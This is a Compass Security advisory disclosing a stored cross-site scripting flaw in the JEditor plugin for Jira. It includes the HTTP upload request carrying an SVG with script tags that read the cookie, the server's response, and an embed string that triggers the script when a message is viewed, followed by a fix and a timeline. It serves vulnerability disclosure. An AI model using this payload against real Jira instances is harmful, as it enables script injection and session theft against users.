#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:   JEditor plugin for Jira [1]
# Vendor:    Bobronix
# CSNC ID:   CSNC-2020-003
# Subject:   Stored Cross-Site Scripting (XSS)
# Risk:      High
# Effect:    Remotely exploitable
# Author:    Lukasz D. (advisories@compass-security.com)
# Date:      23.06.2020
#
#############################################################

Introduction:
-------------
JEditor is the most powerful rich text editor for Jira. You can insert
screenshots, complex tables, tabs and also add code blocks and math. It allows
you to use built-in templates and styles or create your own. JEditor renders a
powerful, yet easy to use, rich text editor to simplify your daily issue
editing routine.

Although its extensive input sanitization mechanisms that aim to prevent XSS
vulnerabilities, it was found that a certain functionality in JEditor can be
abused to store code that would be executed in the browser of users who visited
the malicious page.

Affected:
---------
The following versions of the JEditor plugin are vulnerable:
3.6.3 and possibly earlier versions

Technical Description:
----------------------
It is possible to attach images to the messages created with JEditor.
In particular, one can attach SVG images with JavaScript content inside.

Request sent while attaching an SVG image:
POST /plugins/servlet/jeditor_file_uploader?type=Images&atl_token=<tn> HTTP/1.1
Host: jira.example.com
Content-Type: multipart/form-data; boundary=---------------------------12345678
Cookie: atlassian.xsrf.token=<tn>; [CUT]
Connection: close

-----------------------------12345678
Content-Disposition: form-data; name="upload"; filename="xss.svg"
Content-Type: image/svg+xml
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(location.origin)</script>
<script>alert(document.cookie)</script>
</svg>

-----------------------------12345678

The server answers with the link to the uploaded file:
https://jira.example.com/plugins/servlet/jeditor_file_provider?imgId=
    ckupload202005298301739482710384937&fileName=xss.svg

Upon accessing the link, the following response is received:
HTTP/1.1 200
[CUT]
X-Content-Type-Options: nosniff
Content-Disposition: inline; filename="xss.svg"
Content-Type: image/svg+xml;charset=UTF-8
Connection: close

<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(location.origin)</script>
<script>alert(document.cookie)</script>
</svg>

The browser (tested with Chrome 81) will execute the returned JavaScript
content in the context of the Jira application.

In order to trigger the JavaScript execution when a message created with
JEditor is viewed instead of having to lure the user into visiting the link,
the following string may be placed as message content in the JSON sent to the
server: "<p>xss</p><embed src='https://jira.example.com/plugins/servlet/jeditor
_file_provider?imgId=ckupload202005298301739482710384937&fileName=xss.svg'>\n"

Note that, although 'embed' tags are not rendered in messages created with
JEditor, the linked SVG file will be nevertheless fetched and the payload
contained inside executed.

Workaround / Fix:
-----------------
It needs to be ensured that the uploaded SVG files are sanitized or not served
as inline documents when retrieved from the server.

Timeline:
---------
2020-05-29:   Vulnerability discovered
2020-06-07:   Patched version released
2020-06-23:   Public disclosure

References:
-----------
[1]: https://marketplace.atlassian.com/apps/1210768/jeditor-rich-text-editor-for-jira